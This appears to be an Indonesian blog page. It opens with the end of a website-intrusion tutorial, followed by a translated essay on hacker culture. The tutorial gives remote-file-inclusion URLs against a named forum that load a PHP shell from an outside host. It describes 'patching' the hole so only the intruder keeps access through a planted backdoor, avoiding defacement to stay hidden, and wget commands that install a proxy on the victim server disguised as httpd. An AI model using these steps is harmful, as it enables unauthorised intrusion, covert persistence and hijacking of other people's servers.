PHP Injection sudah. Backdooring sudah (Jangan lupa simpan URL backdoor kamu tadi). Sekarang kamu nggak perlu ngemis-ngemis lagi minta shell dari orang lain kayak tutor yang pertama karena kamu udah bisa memproduksi shell kamu sendiri.
3. PATCHING
- Landasan Teori
Patching adalah suatu kegiatan untuk menutup celah keamanan (Vulnerability) dari sebuah website sehingga tidak bisa dieksploitasi lagi oleh siapa pun melaluinya.
Ada hikmah kebaikan dan keburukan dari proses patching yang akan kamu lakukan ini, yaitu :
2. Keburukan : Kamu egois karena hanya ingin menguasai target sendiri saja. Yang lain jadi pada gak bisa masuk lagi deh lewat tuh celah keamanan. Hehehe…
Mari diambil hikmahnya….. yuuu…
- Saatnya Beraksi!
Patching yang kita lakukan terhadap RFI (Remote File Inclusion) Vulnerability ini akan lebih mudah jika dilakukan dengan PHP Shell Injector sejenis C99 yang mempunyai fitur untuk memanipulasi (editing) source file.
Syarat utama melakukan Patching ini yaitu celah keamanan harus berada pada direktori dengan permission 777 (Kecuali kalau kamu punya akses root, kamu bisa melakukan patching di direktori mana pun)
Ada tiga cara yang mungkin bisa kita lakukan untuk patching sebuah RFI Vulnerability, yaitu :
1. Memodifikasi file yang merupakan bug RFI
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?
Nah, di situ akan terlihat perbedaan warna file yang merupakan bug RFI dari target yaitu warna kuning. Atau bisa dilihat dari url PHP Injection di atas tadi. Bug-nya adalah nama file paling belakang dan sebelum tanda tanya, yaitu file usercp_sendpasswd.php. Sekarang anda tinggal klik tulisan edit di ujung yang sebaris dengan file tersebut pada shell c99 (lihat gambar di atas) yang akan menampilkan isi atau source dari file tersebut, seperti ini :
Setelah itu carilah bagian yang serupa dengan tulisan di atas yang bertuliskan include($phpbb_root_path["user"], karena memang bagian ini lah yang bermasalah (bug RFI-nya) sehingga memungkinkan seorang attacker masuk melaluinya (liat lagi URL PHP Injection tadi). Kemudian lanjutkan dengan mengubah tulisan user di atas dengan nama lain misalnya menjadi seperti ini : include($phpbb_root_path["newbee"]. Setelah itu klik save untuk menyimpannya.
Sekarang coba tes melakukan PHP Injection lagi terhadap target seperti pada awal. Hasilnya mungkin akan seperti ini :
Itu berarti celah keamanan tadi telah berhasil dipatch! Pesan error yang muncul tidak mesti selalu sama seperti di atas, dapat juga berbeda-beda tergantung target dan celah keamanannya, bisa saja memunculkan pesan Fatal Error atau lainnya.
2. Ubah nama file tersebut
chmod 777 usercp_sendpasswd.php
mv usercp_sendpasswd.php newbee.php
3. Hapus file tersebut
Coba aja kamu tes lagi melakukan PHP Injection dari awal setelah kamu memakai cara kedua atau cara ketiga. Pasti hasilnya akan seperti atau mirp di bawah ini :
Itu berarti celah keamanan tadi telah ditutup, dan ingat! Jika kamu tidak memiliki akses root, maka kamu HANYA bisa melakukan patching seperti di atas apabila dalam kondisi file bug tersebut berada di direktori 777.
Sector Clear! Patching udah. Lalu gimana donk kita masuk lagi ke shell target kalau PHP Injection gak bisa lagi???
Lah, kan tadi kamu uda pasang backdoor. Masuk aja lewat situ… hehehe.. mulai paham kan algoritmanya? Gampang kan?
Tapi ada cara lain lagi untuk memasuki target tanpa menggunakan backdoor, yaitu dengan menggunakan PHP Shell Injection lagi, namun hanya bisa dilakukan jika kamu menggunakan cara pertama atau kedua saja :
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[newbee]=http://h1.ripway.com/newbe/kambe99.txt?
http://intruder.gmork.cz/forum//includes/newbee.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?
Sekarang minum lagi kopi susunya tadi, ntar keburu dingin loh. Nyante aja udah, kamu dah punya backdoor di sebuah website. Lalu ngapain lagi ya? Deface? Kayaknya gak perlu deh, kalau kamu deface tuh website sama aja ibaratnya kamu kirim surat ke rumah orang yang kamu susupi dan mengatakan ”Hey om! Aku dah pasang pintu rahasia di rumah kamu, jadi aku sekarang bebas berkeliaran di rumah kamu sekalipun kamu kunci semua pintu lainnya!!!”. Si admin tuh website yang tahu keberadaan kamu pasti menggunakan berbagai macam cara untuk mendeteksi backdoor yang kamu pasang tadi, ini tentu aja akan menambah peluang dalam memperpendek umur backdoor kamu yang amat sangat berguna itu.
Daripada melakukakan hal-hal seperti di atas, kamu bisa aja memanfaatkan website tersebut untuk hal-hal menarik lainnya, misalnya aja membuat website itu sebagai proxy server pribadi kamu.
4. CREATE PROXY
- Landasan Teori
Bukan kaleee. Proxy itu adalah sebuah aplikasi yang menjadi media perantara antara kamu (sebagai client) dan ISP sebagai penyedia jasa internet. Sehingga IP address yang kamu pakai atau yang terkoneksi dengan website saat berinternet adalah ip address dari server proxy tersebut. Yang kamu perlu konfigurasikan hanyalah mengatur nama server proxy dan port-nya saja pada browser.
- Saatnya Bereaksi! Eh.. Beraksi!
wget http://www.mith.com/db/osr/proxy.tgz
tar -zxvf proxy.tgz
cd /var/www/intruder/forum/db/pro atau bisa kamu lakukan secara manual saja.
Isi dari folder pro tersebut adalah file xh dan prox
./xh -s “/usr/sbin/httpd” –d ./prox -a -d –p1234
Kalau tidak ada pesan error, berarti semua berjalan lancar. Kalau kamu memakai proxy tersebut, tinggal masukan IP dan PORT proxy tersebut ke dalam settingan browser misalnya Mozilla seperti gambar di bawah ini :
IP proxy di atas adalah IP dari website target tadi. Bisa kamu cek di http://who.is
Setelah sudah disetting, baru cek lagi di http://who.is apakah berfungsi atau tidak. Dan lihat IP kamu di sana apakah sudah berubah mengikuti IP proxy tersebut.
Selamat… Proxy kamu aktif. Kalau tidak berhasil bisa saja terjadi karena ISP (Penyedia Layanan Internet) kamu tidak mengizinkan adanya akses yang menggunakan proxy melalui server mereka.
—————————— Potong di sini ————————————-
Selesai juga akhirnya… Piuuwwhh….
Tapi lega juga…ho ho ho
/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security khususnya cara melakukan penetration test terhadap website sendiri lalu melakukan patching sederhana dan cepat. Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini adalah bukan tanggung jawab saya. */
{
”Lebih baik mempunyai sedikit ilmu tapi mau berbagi dengan yang lain daripada mempunyai banyak ilmu tapi hanya berdiam diri dan menyimpan untuk diri sendiri saja.”
Minggu, 21 Februari 2010
Cara Menjadi Seorang Hacker
Jika anda ingin tahu cara menjadi seorang hacker, hanya ada dua hal yang benar-benar relevan.Ada sebuah komunitas, budaya saling berbagi informasi, dari kaum programmer ahli dan pakar jaringan yang melalui sejarah saat pertama kali minicomputer diciptakan dan awal mula eksperimen ARPAnet. Para anggota budaya ini asal sebenarnya istilah ’hacker’. Hacker yang membangun internet, hacker menciptakan sistem operasi UNIX hingga hari ini. Hacker pula yang menjadikan World Wide Web bekerja. Jika anda merupakan bagian dari budaya ini, jika anda berkontribusi didalamnya dan mereka mengenal anda serta menyebut anda seorang hacker, maka anda memang benar seorang hacker.Pola pikir hacker tidak terbatas pada budaha software-hacker. Ada beberapa orang yang menerapkan sikap hacker tersebut pada hal lainnya, seperti elektronik atau musik – sebenarnya, disini anda dapat menemukan tingkat tertinggi dari ilmu pengetahuan atau seni. Sedangkan software hacker mengenal semangat juang ini dimanapun mereka berada dan menyebut diri mereka “hacker” juga – dan beberapa klaim bahwa dunia hacker tidak terbatas pada dimana mereka bekerja. Namun dalam dokumen ini kita hanya berfokus pada keahlian dan sikap para software hacker, dan tradisi saling berbagi yang mengawali istilah ‘hacker’.Adapula kelompok lain yang menyebut diri mereka hacker, namun sebenarnya tidak. Orang-orang ini (terutama dikalangan remaja) lyang melakukan kerusakan komputer dan membobol sistem telepon.
Para hacker yang sejati menyebut mereka sebagai ‘cracker’ dan tidak ada kaitannya dengan mereka. Hacker sejati menganggap cracker adalah pemalas, tidak bertanggung jawab dan pandai, dan kemampuan yang mereka miliki hanya untuk membobol sistem keamanan tidak lantas menjadi mereka hacker sebagaimana halnya jika anda mampu menjalankan mobil juga tidak lantas menjadikan anda seorang insinyur otomotif. Sayangnya, banyak sekali para jurnalis dan penulis yang salah dalam menggunakan kata ‘hacker’ untuk menggambarkan cracker; hal ini menodai citra hacker sejati.Perbedaan dasar antar hacker dan cracker: hacker membangun sesuatu, crackerlah yang merusaknya.Jika anda ingin menjadi seorang hacker, banyaklah membaca. Jika anda ingin menjadi seorang hacker, bacalah alt.2600 newsgroup dan bersiap-siaplah untuk melakukan 5 dari 10 perbuatan tercela setelah menyadari bahwa anda tidaklah secerdas yang anda kira. Dan itulah mengapa saya menggolongkan anda sebagai cracker.Sikap HackerHacker memecahkan masalah dan membangun sesuatu, dan mereka meyakini kebebasan dan saling membantu satu sama lainnya dengan sukarela.
Untuk diterima sebagai seorang hacker, anda harus berperilakuk seolah-olah hal itu merupakan sikap anda sendiri. Dan untuk berperilaku seakan-akan anda memiliki sikap tersebut, terlebih dahulu anda harus meyakini kebenaran sikap tersebut.Tapi jika anda mengira menerapkan sikap hacker merupakan suatu cara untuk diterima dalam budaya hacker tersebut, anda salah besar. Menjadi orang yang memiliki sikap hacker sangatlah penting bagi anda – untuk membantu anda belajar dan terus termotivasi. Sebagaimana halnya seni penciptaan, cara paling efektif untuk menjadi seorang master adalah berpikir dan bertindak bahwa anda benar-benar seorang master – tidak hanya secara intelektual namun juga secara emosional.Jadi, jika anda ingin menjadi seorang hacker, teruslah mengulang-ulang hal tersebut hingga anda benar-benar menjadi salah satu diantara mereka.1. Dunia yang penuh pesona masalah telah menunggu untuk diatasi.Menjadi seorang hacker sangatlah menyenangkan, namun jenis kesenangan yang diperoleh membutuhkan banyak usaha. Usaha yang memerlukan motivasi. Kesuksesan seorang atlet memerlukan motivasi akan bentuk fisik yang bagus, yang mendorong mereka mengatasi keterbatasan fisik mereka.Sama halnya, untuk menjadi seorang hacker anda perlu keterampilan dasar dalam memecahkan masalah, mempertajam kemampuan dan melatih kecerdasan anda tanpa henti.Jika anda jenis orang yang seperti itu secara alami, anda perlu memiliki tujuan untuk menjadi seorang hacker. Dengan kata lain anda memerlukan semangat hacking yang tidak dirusak dengan mengumbar nafsu seks, uang dan cemoohan masyarakat.(anda juga harus mengembangkan ketekunan dalam belajar – mempercaya bahwa meskipun anda tidak mengetahui semua yang anda perlukan dalam memecahkan masalah, jika anda hanya mampu mengungkap sebagian dan belajar dari hal itu, anda telah cukup belajar mengatasi masalah dibagian berikutnya – dan seterusnya, hingga anda benar-benar berhasil.)2. Tak seorangpun harus mengatasi masalah dua kaliPemikiran kreatif sangatlah berharga, sumber dayanya terbatas.
Tidak seharusnya mereka memboroskan waktu dengan masalah yang sama berulang-ulang disaat berbagai masalah baru telah menunggu diluar sana.Untuk berperilaku seperti seorang hacker, anda harus yakin bahwa waktu berpkir hacker lain sangatlah jitu – jadi nyaris merupakan tugas moral bagi anda untuk berbagi informasi, memecahkan masalah dan memberikan solusi lebih jauh agar hacker lainnya dapat mengatasi masalah yang baru ketimbang menghabiskan waktu pada masalah yang sama berulang-ulang.(Anda tidak perlu percaya bahwa anda harus memberikan seluruh produk kreatif anda, meski para hacker ada pula yang melakukannya untuk memperoleh respek dari hacker lainnya. Konsistensi nilai-nilai hacker untuk menjual produknya hanyalah sekedar untuk makan dan biaya sewa komputer. Konsistensi dalam menggunakan keahlian hacking anda untuk mendukung keluarga atau memperoleh kekayaan, tidak apa-apa sepanjang anda tidak lupa bahwa anda adalah seorang hacker.)3. Bosan dan kejenuhan adalah musuh utama.Kaum hakcer (dan orang-orang kreatif pada umumnya), semestinya tidak pernah menjadi bosan atau jenuh terhadap pekerjaan rutin, karena saat hal ini terjadi maksdunya mereka tidak melakukan apa yang mereka mampu lakukan – memecahkan masalah baru. Hal ini hanya akan menyakit perasaan setiap orang. Oleh karena itu bosan dan kejenuhan bukan hanya tidak diinginkan melainkan juga musuh utama.Untuk berperilakuk sebagai seorang hacker, anda harus percaya hal ini cukup untuk berada sejauh mungkin dari kebosanan, tidak hanya untuk diri anda sendiri namun juga bagi orang lain (khususnya hacker lainnya).(Terdapat beberapa pengecualian untuk hal ini.
Para hacker terkadang melakukan sesuatu yang tampaknya berulang-ulang atau membosankan untuk memperhatikan dan melatih kejernihan pikirannya, bertujuan untuk mempertajam kemampuan atau mendapatkan beberapa pengalaman tertentu yang tidak dimiliki oleh orang lain. Namun dengan pilihan ini – tak seorang pun bisa memperkirakan kapan mereka terperosok dalam kejenuhan.)4. Kebebasan adalah hal yang baik.Kaum hacker pada dasarnya anti-penguasa. Setiap orang yang mencekoki anda denga pemikiran ala penguasa, pada umumnya memiliki beberapa alasan tertentu untuk melakukannya pula. Jadi sikap sok berkuasa harus dilawan dimanapun anda berada, untuk mengurangi jeratan yang melilit anda dan para hacker lainnya.(Hal ini tidak berarti melawan seluruh penguasa.
Anak-anak perlu dididik dan kejahatan harus dicegah. Seorang hacker bisa menerima beberapa jenis kekuasaan yang bertujuan sama dengan yang dia inginkan daripada menghabiskan waktunya dengan menuruti tujuan lainnya. Namun adakalanya perlu dilakukan tawar-menawar, jenis penyerahan diri pada kekuasaan tidak akan pernah mereka berikan.)Para penguasa identik dengan penyensoran dan kerahasiaan. Mereka tidak pernah mempercayai ketulusan kerja sama dan berbagi informasi – mereka hanya menyukai ‘kerja sama’ yang dapat mereka kendalikan. Jadi untuk berperilaku sebagai seorang hacker, anda harus mengembangkan suatu kebencian terhadap penyensoran, kerahasiaan, dan penggunaan kekerasan atau tipu daya guna menghindari tanggung jawab. Dan anda harus bersedia bertindak berdasarkan keyakinan tersebut.5. Sikap tidak menggantikan keahlian.Untuk menjadi seorang hacker, anda harus mengembangkan beberapa sikap ini. Tapi membatasi diri pada sebuah sikap tunggal tidak akan menjadikan anda seorang hacker, atau apapun yang menjadikan anda sebagai seorang atlet juara atau bintang tenar.
Menjadi seorang ahcker memerlukan kecerdasan, latihan, dedikasi dan kerja keras.Oleh karena itu, anda harus belajar mempercayai sikap dan menghormati keahlian setiap orang. Kaum hacker tidak akan membiarkan pecundang membuang-buang waktu mereka, namun mereka menghormati keahlian – terutama keahlian hacking, keahlian apapun adalah baik. Keahlian membutuhkan keterampilan yang hanya beberapa master yang mampu, dan keahlian membutuhkan kecakapan yang terkait dengan sikap mental dan penjiwaan yang terbaik.Jika anda menyukai keahlian, anda akan suka mengembangkan diri anda sendiri – kerja keras dan dedikasi menjadi suatu permainan yang menarik daripada membosankan. Dan itu merupakan hal terpenting guna menjadi seorang hacker.Keahlian Dasar HackingSikap hacker sangatlah penting, tetapi keahlian jauh lebih penting.
Sikap tidak untuk mengganti keahlian, ada beberapa tolok ukur keterampilan dasar tertentu yang harus anda miliki sebelum anda bermimpi menjadi seorang hacker.Tolok ukur ini senantiasa berubah seiring dengan perkembangan teknologi yang membutuhkan keterampilan baru yang membuat usang keterampilan lam. Sebagai contoh, dulu pemrograman bahasa mesin sangat diperlukan tanpa perlu mempelajar sesuatu yang berhubungan dengan HTML. Namun di kahir 1996 sangatlah penting untuk menyertakan keahlian dalam bidang berikut ini:1. Belajar cara memprogram.Tentu saja, ini merupakan keahlian dasar hacking. Tahun 1997 anda harus mutlak menguasai bahasa C (bukan hanya sekedar coba-coba belajar). Anda bukanlah seorang hacker atau programmer jika anda hanya mengetahui satu bahasa – anda perlu belajar cara berpikir mengenai masalah pemrograman secara umum, tidak tergantung pada satu bahasa pemrograman saja. Untuk menjadi seorang hacker sejati, anda harus mendapatkan petunjuk dimana anda dapat mempelajari bahasa baru selama berhari-hari dengan menghubungkan petunjuk terhadap apa yang telah anda ketahui. Maksudnya anda harus mempelajari beberapa bahasa pemrograman yang berbeda.Disamping C, anda harus mempelakari LISP dan Perl (kalau perlu Java). Disamping pentingnya bahasa pemrograman, yang setiap bahasa tersebut memiliki pendekatan berbeda, dan memberikan anda pelajaran yang sangat berharga.Saya tidak dapat memberikan petunjuk lengkap cara belajar pemrograman itu disini – membutuhkan keahlian yang kompleks.
Namun saya bisa memberitahukan anda bahwa buku dan kursus tidak akan melakukan segalanya (mungkin kebanyakan karena pemikiran terbaik oleh para hacker). Apa yang perlu dilakukan adalah (a) membaca code dan (b) menulis code.Belajar memprogram seperti belajar bahasa menulis bahasa asli. Cara terbaik untuk melakukan hal tersebut adalah membaca materi yang ditulis oleh para master dibidang masing-masing, menuliskan beberapa hal tentang diri anda, membaca lebih banyak, menulis lebih sedikit, membaca lebih banyak lagi, menulis lebih banyak… dan terus diulang-ulang hingga anda mulai menulis untuk mengembangkan dan mempertajam kemampuan sesuai dengan yang anda inginkan.Dahulu, menemukan code yang bagus untuk dibaca sangatlah sulit, karena beberapa program besar hanya menyediakan sumbernya untuk para calon hacker yang membaca dan bekerja dengannya. Kini semuanya telah berubah secara dramatis antara lain; software gratis, tool pemrograman gratis, dan sistem operasi gratis (semuanya menyediakan kode sumber, dan seluruhnya dibangun oleh kaum hacker) serta digunakan secara luas.2. Memperoleh, mempelajari, dan menjalankan UNIX secara gratis.
Saya beranggapan anda telah memiliki personal computer atau dapat mengaksesnya ditempat lain. Langkah pertama yang terpenting bagi para newbie guna mendapatkan keahlian hacker adalah mendapatkan copy Linux atau salah satunya yakni free BSD-Unix, install pada komputer anda dan jalankan.Ya, ada beberapa sistem operasi lainnya selain Unix. Namun mereka terdistribusi dalam biner (terkompilasi) – anda tidak dapat membaca code tersebut, dan anda tidak dapat memodifikasinya. Mencoba belajar menghack melalui DOS atau Windows atau MacOS seperti sama halnya belajar menari dengan tubuh terikat.Selain Unix sebagai sistem operasi di Internet. Anda bisa saja belajar menggunakan Internet tanpa perlu mengenal Unix, tetapi anda tidak dapat menjadi seorang hacker internet tanpa memahaminya. Untuk alasan inilah, budaya hacker saat ini sangat berfokus pada Unix. (Hal ini tidaklah selalu benar, karena beberapa hacker generasi lama tidak menyukainya, namun simbiosis antara Unix dan Internet menjadi cukup kuat yang bahkan Microsoft tidak mampu menggoyahkannya.)Jadi, pelajarilah Unix – saya sendiri menyukai Linux namun ada cara lainnya. Mempelajarinya. Menjalankannya. Bekerja dengannya. Menghubungkannya ke internet. Membaca kode-nya. Dan memodifikasi kodenya. Anda akan mendapatkan alat pemrograman yang lebih baik (termasuk C, Lisp, dan Perl) ketimbang sistem operasi Microsoft yang anda impikan, anda memperoleh kesenangan, dan anda mendapatkan lebih banyak ilmu ketimbang anda merealisasikan yang telah anda pelajari hingga anda menoleh kebelakang sebagai seorang master hacker.Untuk mempelajari Unix, lihat The Loginataka.Untuk mempelajari Linux, lihat Where To Get Linux.3. Belajar Cara Menggunakan World Wide Web dan Menulis HTMLBanyak hal dari budaya hacker yang membangun pekerjaan mereka diluar dari hal ini, membantu menjalankan pabrik, perkantoran dan universitas tanpa berpengaruh langsung pada kehidupan orang-orang awam. Web adalah satu pengecualian terbesar, mainan hacker yang berkilauan ini diakui telah mengubah dunia ketimbang politik. Untuk alasan tunggal inilah, anda harus belajar cara bekerja dengan Web.Hal ini tidak berarti mempelajari cara menggunakan browser (siapapun dapat melakukan hal itu), namun mempelajari cara menulis HTML, bahasanya Web. Jika anda tidak mengetahui cara memprogram, menulis HTML yang membantu anda belajar. Bangunlah sebuah website.Namun hanya memiliki sebuah website tidak lantas menjadikan anda cukup baik untuk menjadi hacker.
Web merupakan himpunan home page. Anda memerlukan petunjuk tentang dunia HTML, lihat The HTML Hell Page).Agar berguna, halaman anda harus memiliki isi (content) – harus menarik dan/atau bermanfaat bagi hacker lainnya.Status Budaya HackerSeperti kebanyakan budaya tanpa kemandirian ekonomi, hackerdom memiliki reputasi. Anda mencoba memecahkan masalah yang menarik, namun betapa menariknya mereka, dan apakah solusi anda benar-benar baik, adalah suatu hal yang memerlukan kemampuan teknis atau kepakaran yang diperlukan untuk menilai.Berdasarkan hal itu, saat anda melakukan permainan hacker, anda belajar menjaga skor utama anda melalui apa yang hacker lain pikirkan tentang keahlian anda (inilah mengapa anda tidak benar-benar menjadi seorang hacker hingga hacker lainnya secara konsisten menyebut anda sebagai hacker). Kenyataannya adalah image yang tidak jelas tentang hacking seperti pekerjaan mereka yang terkungkung; juga dengan larangan budaya hacker (sekarang berangsur-angsur memudar tapi masih berpotensi) terhadap pengakuan bahwa ego atau pengakuan dunia luar merupakan salah satu dari motivasi seseorang.Khususnya, hackerdom adalah apa yang para ahli antropologi sebagai budaya terikat. Anda mendapatkan status dan reputasi didalamnya dengan tidak dengan mendominasi orang lain, tidak mengandalkan kecantikan, tidak memiliki sesuatu yang orang lain inginkan, namun memberikan sesuatu yang lebih berharga.
Khususnya, memberikan waktu anda, kreatifitas anda, dan hasil dari kemampuan anda.Ada 5 hal mendasar yang bisa anda lakukan untuk dihormati oleh para hacker:1. Menulis Software Gratis Anda.Hal pertama (pada umumnya) adalah menulis program yang hacker lain anggap sangat menyenangkan dan bermanfaat, dan memberikan sumber program ke dunia hacker untuk digunakan.Hackerdom seperti kelompok manusia setengah dewa yang menulis sebagian besar, program hebat yang kita temui diseluruh dunia dan banyak digunakan oleh setiap orang.2. Membantu Menguji dan Mendebug Software Gratis.Mereka juga melayani orang-orang yang membuat dan mendebug software gratis. Dalam dunia yang tidak sempurna ini, kita tidak dapat menghindari sebagian besar waktu yang dihabiskan dalam pengembangan software adalah saat mendebug. Itulah mengapa penulis software gratis orang-orang berpikir untuk memberitahukan anda bahwa penguji beta yang baik (siapapun yang mengetahui cara menggambarkan gejalanya, dan bersedia menerapkan beberapa contoh rutin diagnosanya) merupakan hadiah paling berharga bagi mereka.
Bahkan orang ini bisa membuat perbedaan antara fase mendebug yang memakan waktu lama, mimpi buruk yang menakutkan dan orang itu mau bersusah-payah demi sesuatu yang berguna.Jika anda seorang newbie, cobalah mencari sebuah program yang masih dikembangkan, bahwa anda tertarik dengannya dan menjadi seorang penguji beta yang baik. Itulah sifat alami untuk membantu menguji program membantu mendebug-nya guna membantu mereka memodifikasi. Banyak hal yang dapat anda pelajari dalam hal ini, dan memberikan anda karma yang baik pada orang-orang yang anda bantu di kemudian hari.3. Publikasikan informasi yang berguna.Hal baik lainnya adalah mengumpulkan dan menyaring informasi yang berguna dan menarik pada halaman web atau dokumentasi seperti FAQ (Frequently Asked Question) dan tersedia untuk umum.Pemelihara sebagaian besar FAQ teknis juga mendapatkan kehormatan yang sama dengan penulis software gratis.4. Membantu menjaga kerja infrastruktur.
Budaya hacker (dan pengembangan mesin Internet dijalankan oleh para sukarelawan. Ada banyak kebutuhan namun kerja yang tidak glamour senantiasa dikerjakan – mengadministrasi mailing list, memoderasi newsgroup, memelihara situs arsip software yang besar, mengembangkan RFC dan standar teknis lainnya.Orang-orang yang melakukan hal ini layak mendapatkan kehormatan, karena setiap orang mengetahui pekerjaan ini memakan banyak waktu dan tenaga serta tidak banyak kesenangan yang didapat sebagaimana bermain-main dengan kode. Mereka telah menunjukkan dedikasinya.5. Melayani budaya hacker itu sendiri.Akhirnya, anda bisa melayani dan menyebarluaskan budaya itu sendiri (misalkan tentang cara terbaik untuk menjadi seorang hacker :-)).Ini bukanlah sesuatu yang harus anda lakukan telah anda menjadi terkenal dan melakukan 4 hal diatas.Budaya hacker tidak memiliki pemimpin, tepatnya, namun mereka memiliki pahlawan dan adat-istiadat turun menurun dan bahasa. Saat anda melakukan perjalanan yang cukup panjang, mungkin anda tumbuh disini. Waspadalah: para hacker tidak mempercayai egoisme dalam budaya mereka, jadi sejauh mata memandang, egoisme dikenal sangat berbahaya. Ketimbang berupaya untuk hal itu, anda harus menyadari urutan posisi anda sendiri dan menjadi teladan dan bersikap ramah mengenai status anda.
The Hacker/Nerd ConnectionBerlawanan dengan mitos terkenal, anda tidak harus menjadi seorang nerd untuk menjadi seorang hacker. Hal itu memang membantu, bagaimanapun juga, dan sebagian hacker adalah nerd yang sebenarnya. Menjadi seorang terkucil dari masyarakat membantu anda tetap terkonsentrasi pada hal yang benar-benar penting, seperti berpikir dan hacking.Untuk alasan inilah, sebagian hacker mengadopsi label ‘nerd’ dan bahkan menggunakan istilah lebih keras, yakni ‘geek’ sebagai badge kebanggaan mereka – inilah suatu cara menyatakan independensi mereka dari anggapan masyarakat awam. Lihat The Geek Page untuk pembahasan lebih lanjut.Jika anda bisa mengatur konsentrasi yang layak pada hacking untuk menjadi lebih baik dan masih memiliki kehidupan, itu sangat baik. Sekarang lebih mudah daripada saat saya masih menjadi seorang newbie; adat budayanya jauh lebih bersahabat terhadap techno-nerd. Ada beberapa orang yang menyatakan bahwa para hacker merupakan calon pacar/suami/istri yang berkualitas tinggi. Untuk informasi lebih jauh tentang hal ini silakan lihat Girl's Guide to Geek Guys.Jika anda tertarik pada hacking karena anda tidak memiliki penghidupan, tidak masalah juga – setidaknya anda tidak memiliki kesulitan dalam konsentrasi.
Mungkin anda akan mendapatkan jodoh, suatu hari nanti.Titik GayaSekali lagi, untuk menjadi seorang hacker, anda harus memiliki pola pikir seorang hacker. ada beberapa hal yang bisa anda lakukan saat anda tidak berada di depan komputer untuk membantu orang lain. Hal ini mungkin saja tidak berhubungan dengan hacking namun sebagian hacker melakukannya, dan merasa bahwa mereka memiliki ketertarikan di bidang yang sama.
Bacalah buku fiksi sains. Pergilah ke pertemuan fiksi sains (cara terbaik untuk berjumpa dengan hacker dan proto-hacker).
Study Zen, dan/atau mengambil seni beladiri. (disiplin jiwa sangatlah penting.)
Mengembangkan kemampuan bermain musik. Belajar mengapresiasikan jenis musik khusus. Belajar memainkan beberapa instrumen musik dengan baik, atau cara menyanyi.
Mengembangkan apresiasi anda dengan mengikuti kuis berhadiah.
Belajar menulis dalam bahasa asing dengan baik. (sejumlah hacker juga adalah seorang penulis buku.)Ada banyak hal yang harus anda lakukan, terutama adalah bahwa anda memiliki kapasitas sebagai seorang hacker. Mampu menggunakan kecakapan otak sebelah kiri dan kanannya adalah sangat penting (para hacker harus mampu berpikir secara logis dan bertindak tidak logis guna memecahkan masalah suatu waktu.)Akhirnya, beberapa hal yang tidak boleh dilakukan.
Jangan bertindak bodoh, membesar-besarkan user ID atau screen name.
Jangan mengobarkan kebencian di Usenet (atau ditempat lainnya)
Jangan menggelari diri anda sendiri sebagai ‘cyberpunk’, dan jangan membuang-buang waktu anda pada setiap orang.
Jangan memposting atau menulis email yang dipenuhi kesalahan eja dan tata bahasa yang buruk.Jangan menjadikan diri anda atau orang lain sebagai bahan ejekan. Para hacker memiliki ingatan yang panjang – yang mengakibatkan anda perlu waktu bertahun-tahun agar anda bisa diterima.Narasumber lainnyaTerjemahan dokumen ini tersedia dalam bahasa Prancis, Spanyol dan Jepang.Loginataka memiliki beberapa hal untuk disampaikan mengenai pelatihan dan sikap yang layak dari seorang Unix Hacker.Saya juga telah menulis mengenai A Brief History Of HackerdomPeter Seeback memelihara suatu Hacker FAQ yang luar biasa ini bagi para manager yang tidak memahami cara bergaul dengan hacker.Saya telah menulis sebuah paper, The Cathedral and the Bazaar, yang menjelaskan seluk beluk budaya Linux. Anda dapat menemukannya di halaman ini.Frequently Asked Questions (Pertanyaan yang seringkali diajukan)Q: Bersediakan anda mengajari saya cara melakukan Hack?Semenjak awal publikasi halaman ini, saya banyak mendapat permintaan dari orang mengenai “ajari saya semua tentang hacking”. Sayangnya, saya tidak memiliki waktu atau energi untuk melakukan hal ini; proyek hacking saya sendiri memerlukan 110% dari waktu saya.Bahkan bila saya melakukannya, hacking adalah suatu sikap dan keahlian yang pada dasarnya harus anda miliki untuk mengajarkan diri anda sendiri.
Anda akan menjumpai bahwa saat seorang hacker sejati ingin membantu anda, mereka tidak akan menghormati anda jika anda meminta dengan menghiba-hiba segala sesuatu yang mereka ketahui.Pelajari beberapa hal untuk pertama kalinya. Tunjukkan bahwa anda telah mencoba, bahwa anda mampu belajar sendiri. Kemudian jumpailah seorang hacker dengan pertanyaan tersebut.Q: Dimana saya dapat berdialog dengan seorang hacker sejati?Baiklah, yang jelas bukan melalui IRC, saya yakin –- disana tidak ada satupun selain flamer dan cracker, sejauh yang saya ketahui. Cara terbaik adalah mencari suatu kelompok pengguna Linux atau Unix setempat untuk anda dan melakukan dialog dengan mereka (ada direktori halaman kelompok pengguna Linux di Sunsite).Q: Bahasa apa yang harus saya pelajari untuk pertama kali?HTML, jika anda tidak mengetahuinya. Ada banyak sumber, hype-HTML, buku panduan HMTL diluar sana, dan sebagainya. Salah satu yang terbaik adalah HTML: The Definitive Guide.Saat anda mulai melakukan pemrograman, saya sarankan memulainya dengan Perl atau Phython. C juga sangat penting, namun juga lebih sulit.Q: Bagaimana saya memulainya? Dimana saya bisa mendapatkan free UNIX?Disuatu tempat dihalaman ini saya sertakan petunjuk dimana mendapatkan Linux. Untuk menjadi seorang hacker anda perlu dorongan dan inisiatif dan kemampuan untuk mendidik diri anda sendiri. Mulailah sekarang…
Sumber : Wanchee100